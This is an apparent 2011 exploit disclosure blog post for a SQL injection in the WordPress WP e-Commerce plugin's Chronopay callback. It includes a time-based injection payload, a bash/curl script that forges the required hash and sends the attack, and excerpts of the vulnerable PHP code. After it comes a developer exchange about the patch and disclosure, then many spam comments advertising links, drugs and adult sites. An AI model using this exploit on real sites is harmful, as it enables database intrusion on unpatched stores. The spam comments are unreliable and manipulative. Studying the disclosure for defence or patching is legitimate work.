# Exploit Title: WordPress WP e-Commerce plugin <= 3.8.6 SQL Injection Vulnerabi
lity
# Date: 2011-09-13
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/wp-e-commerce.3.8.6.zip
# Version: 3.8.6 (tested)
# Note: parameter $_POST["cs3"] == md5(md5(urldecode($_POST["cs1"])))
# it has a "chronopay_salt" option but it's set to '' by default (see more
description down below)
---------------
PoC (POST data)
---------------
http://www.site.com/?chronopay_callback=true
cs2=chronopay&cs1=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97
,112))),0)%23&cs3=123f7bcd4ba53fade05886a7e77bf045&transaction_type=rebill
e.g.
#!/bin/bash
payload="-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)
#"
hash=`echo -n $payload | md5sum | tr -d '\n' | sed 's/\s*-\s*//g' | md5sum | tr
-d '\n' | sed 's/\s*-\s*//g'`
curl --data "cs2=chronopay&cs1=$payload&cs3=$hash&transaction_type=rebill" http:
//www.site.com/?chronopay_callback=true
---------------
Vulnerable code
---------------
./wp-e-commerce/wp-shopping-cart.php:
class WP_eCommerce {
function WP_eCommerce() {
add_action( 'plugins_loaded', array( $this, 'init' ), 8 );
}
...
function init() {
...
$this->load();
...
}
function load() {
...
wpsc_core_load_gateways();
...
}
...
$wpec = new WP_eCommerce();
./wp-e-commerce/wpsc-core/wpsc-functions.php:
function wpsc_core_load_gateways() {
global $nzshpcrt_gateways, $num, $wpsc_gateways,$gateway_checkout_form_f
ields;
$gateway_directory = WPSC_FILE_PATH . '/wpsc-merchants';
$nzshpcrt_merchant_list = wpsc_list_dir( $gateway_directory );
$num = 0;
foreach ( $nzshpcrt_merchant_list as $nzshpcrt_merchant ) {
if ( stristr( $nzshpcrt_merchant, '.php' ) ) {
require( WPSC_FILE_PATH . '/wpsc-merchants/' . $nzshpcrt_merchan
t );
}
./wp-e-commerce/wpsc-merchants/chronopay.php:
function nzshpcrt_chronopay_callback()
{
...
if(isset($_GET['chronopay_callback']) && ($_GET['chronopay_callback'] ==
'true') && ($_POST['cs2'] == 'chronopay'))
{
$salt = get_option('chronopay_salt');
// - this is by default '' and set only if explicitly stated
// inside Store Settings->Payments->General Settings->
// Chronopay->Edit->Security Key
// - problem is that there are more popular payment gateways enliste
d (e.g.
// Google Checkout and PayPal) and if that setting is not explicit
ly set
// it wide opens the door to the potential attacker
$gen_hash = md5($salt . md5($_POST['cs1'] . $salt));
if($gen_hash == $_POST['cs3'])
{
...
$sessionid = trim(stripslashes($_POST['cs1']));
$transaction_id = trim(stripslashes($_POST['transaction_id']));
$verification_data['trans_id'] = trim(stripslashes($_POST['trans
action_id']));
$verification_data['trans_type'] = trim(stripslashes($_POST['tra
nsaction_type']));
switch($verification_data['trans_type'])
{
...
case 'rebill':
$wpdb->query("UPDATE `".WPSC_TABLE_PURCHASE_LOGS."` SET
`processed` = '2',
`transactid` = '".$transaction_id."'
,
`date` = '".time()."'
WHERE `sessionid` = ".$sessionid." LIMIT
1");
...
add_action('init', 'nzshpcrt_chronopay_callback');
p.s. automated tools are easily adapted to exploit this vulnerabilityp.p.s.:
32 comments:
Hi Moroslav,
I'm Gary, lead developer of WP e-Commerce plugin.
Thanks for discovering and contacting us regarding this security vulnerability.
We've pushed out a fix for this in 3.8.6.1 and 3.7.8.1.
Although we appreciate your good intentions, if next time you discover a security hole, please let us have a chance to fix it before disclosing it to the public. This is to prevent malicious hackers from taking advantage of the vulnerability before users have a chance to upgrade their website.
Thanks again!
Gary.
Dear Gary.
I've tried to send you details far before the public disclosure but your boss just buzzed me off. I've asked him politely for any contact information and he replied with "i have no idea what you're talking about or who you are".
Kind regards
@garyc40 This is disturbing to hear, not the exploit which was dealt with quickly, but the fact that Miroslav tried to notify you and was blown off. I use WP e-commerce and have purchased Gold Cart and expect more.
I'm upgrading now and putting out an urgent message to customers, will put a post together to explain in simple terms how to patch this without upgrading to 3.8.6.1. Thanks for the heads up Miroslav! :)
Hi Miroslav, mike:
I'm sure Dan was unintentional when he said he didn't know who you were and what you were talking about.
In the tweet that you tagged him, you didn't explain that you discovered the exploit. In the tweet before that when you said you hit the jackpot, you didn't tag him. So I guess he didn't know the context of the conversation.
We really appreciate help from the community, and if you look at our announcement post of the release, your name is credited as it should.
Really sorry for the misunderstanding. Dan's on a business trip and is simply too busy, so I hope you understand that he was confused.
Don't hesitate to contact us next time when you find any other issue or have suggestions. You can contact us via the Contact form on getshopped.org, or send me an email to gary@instinct.co.nz. Our google code repository is also the main place where bugs and issues are discussed (code.google.com/p/wp-e-commerce), but for security issues, email is the safest route.
Best,
Gary.
Just double checked and saw that our contact form was unpublished for some reason. I'm checking with other team mates about that. Sorry for the inconvenience!
@gary: "contact form was unpublished for some reason" - that was the main reason i've contacted Dan at the first place. couldn't find any other way to contact you guys.
Good information .i always like to read the quality content. And i am really happy to found this information on your blog. Thanks for sharing this opportunity to leave a comment.
hi!,I like your writing so much! share we communicate more about your article on AOL?
I need an expert on this area to solve my problem. Maybe that's you! Looking forward to see you.
Also see my website: bf3blog.com
Hi my pal! I like to declare that this article is amazing, nice compiled you
need to include virtually all vital infos. I’d want to see more posts along these lines.
Have a look at my homepage :: elcheproperty.net
Hey simply was going to offer you a fast heads up. The words wearing your
content look like running from the screen in Opera. I'm not really certain that it's really a
style factor as well related to web browser compatibility but I thought I'd post to inform that. The style and design look good though! Hope you the particular issue solved shortly. Kudos
Feel free to surf my web page belito.pixnet.net
I’m not that much of a online reader to be honest but your
blogs really nice, keep it up! I'll go ahead
and bookmark your site to come back in the future. Many
thanks
My web site ... Hochseefischen Online Community - Blogs - Kleinanzeigen und sowie Galerie
I have been absent for some time, but now I remember why I used to
love this web site.
Thanks , I will try and check back more frequently.
How frequently you update your site?
Here is my web site : classified ad Alhaurin de la Torre
After research just a few of the weblog posts on your
website now, and I really like your manner of blogging.
I
bookmarked it to my bookmark web site list and will be checking again soon.
Pls take a look at my website
online as well and let me know what you think.
Also visit my webpage :: spain is not uganda twitter
Thanks so much for providing individuals with an extremely
superb opportunity to discover
important secrets from this site. It is usually so beneficial
plus
stuffed with fun for me personally and my office
colleagues to search the blog particularly 3 times in one week to read
the newest guides you will have. And of course,
we are at all times
pleased concerning the attractive thoughts served by you.
Selected 1 ideas in this article are ultimately the most efficient I've ever had.
Look at my weblog marthaschool.blogspot.ru
I'm also writing to let you understand what a terrific discovery my friend's princess found reading through your
blog. She
even learned lots
of things, not to mention what it is like
to possess an excellent
coaching character to have the others without difficulty master certain very confusing
subject areas. You really surpassed visitors' desires.
Thanks for coming up with those valuable, healthy, explanatory as well as unique tips on your topic to Julie.
Take a look at my web page ; cognised
I’ve read several good stuff here. Definitely worth bookmarking for revisiting.
I
surprise how much effort you put to create such a great
informative website.
My web page - Spain forums,
Pretty component to content. I just stumbled
upon your web site and in accession capital to claim that I
acquire in
fact loved account your blog posts. Any way I’ll be
subscribing to your augment or even I achievement you access constantly quickly.
My website - Visit Cole's homepage
Thanks for the marvelous posting! I
quite enjoyed reading it, you could be a great author.
I will be sure to bookmark your blog and will come back in the foreseeable
future. I want to encourage you continue your great writing, have a nice weekend!
Review my website :: almunecarproperty.sosblogs.com
Fantastic beat ! I would like to apprentice while you amend your website, how could
i subscribe for a blog site? The account helped me a
acceptable deal. I had been tiny bit acquainted of this your broadcast provided bright clear
concept
Review my blog : flavorchem.com
Valuable information. Lucky me I discovered your site
accidentally, and I am surprised why this accident
did not came about in advance! I bookmarked it.
Also visit my webpage kiezfunk.net
Good write-up, I am normal visitor of one’s website, maintain up the
nice operate, and It is going to be a regular visitor for a lengthy time.
Look at my webpage ... http://loungefoamsleeper.com/Rent-Luxury-Villa-In-Spain--How-Is-It-Possible-To-Snow-Ski-In-Granada.htm
I keep listening to the news broadcast
talk about receiving boundless online grant applications so I have been looking around for
the most excellent site to get one. Could you tell me please, where could i find
some?
My web blog www.fishingspain.net
www.blogger.com owner you are great
[url=http://luv-2-share-pics.tumblr.com]sexy girls pics[/url]
www.blogger.com gives me so much fun, thanks
[url=http://topbettingtips.tumblr.com]http://topbettingtips.tumblr.com[/url]
excellent submit, very informative. I
ponder why the other specialists of this sector
do not notice this.
You should continue your writing. I am confident, you
have a great readers'
base already!
my website: beatzreport.blogspot.ru
Hey! Do you know if they make any plugins to assist with
SEO? I'm trying to get my blog to rank for some targeted keywords but I'm not
seeing very good
results. If you know of any please share. Cheers!
Feel free to surf my web-site - http://astronewsenglish.blogspot.co.uk/2004/08/today-picture-x-price-gift-and-future.html
It's a pity you don't have a donate button!
I'd certainly donate to
this brilliant blog! I suppose for now i'll settle for
bookmarking and adding your RSS feed to my Google account.
I look forward to fresh updates and will share this website with my Facebook group.
Chat soon!
My web site: Www.scuolamedianievo.it
buy valium valium urine drug screen - legal buy valium online usa
Best adult ppc
[url=http://www.youtube.com/watch?v=QdRWd3nJFjE]adult pay per click[/url]
Are you searching for [url=http://bbwroom.tumblr.com]BBW amateur pics[/url] this www is the right place for you!
www.blogger.com owner you are awsome writer
Here you got some [url=http://epic-quotes.tumblr.com]funny quotes tumblr[/url] for better humour
Post a Comment